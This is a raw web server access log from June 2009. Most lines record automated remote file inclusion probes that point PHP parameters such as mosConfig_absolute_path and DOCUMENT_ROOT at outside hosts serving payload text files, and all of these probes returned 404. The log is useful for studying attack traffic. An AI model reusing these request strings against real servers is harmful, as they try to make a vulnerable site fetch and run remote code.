93.188.112.35 - - [27/Jun/2009:06:11:04 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
93.188.112.35 - - [27/Jun/2009:06:11:04 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
93.188.112.35 - - [27/Jun/2009:06:11:04 -0500] "GET /logs/access_log.1237680000//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
93.188.112.35 - - [27/Jun/2009:06:11:04 -0500] "GET /logs/access_log.1236297600//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
212.112.168.146 - - [27/Jun/2009:06:12:08 -0500] "GET /logs/access_log.1241395200//s_loadenv.inc.php?DOCUMENT_ROOT=http://othteam5.t35.com/idv6.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
212.112.168.146 - - [27/Jun/2009:06:12:56 -0500] "GET /logs/access_log.1239667200//s_loadenv.inc.php?DOCUMENT_ROOT=http://othteam5.t35.com/idv6.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
123.125.64.38 - - [27/Jun/2009:06:12:56 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
75.125.198.130 - - [27/Jun/2009:06:13:06 -0500] "GET /logs/access_log.1236988800//skins/advanced/advanced1.php?pluginpath[0]=http://www.sameta.ru/docs/baner.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:06:16:41 -0500] "GET /logs/access_log.1232409600/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 308 "-""Mozilla/5.0"
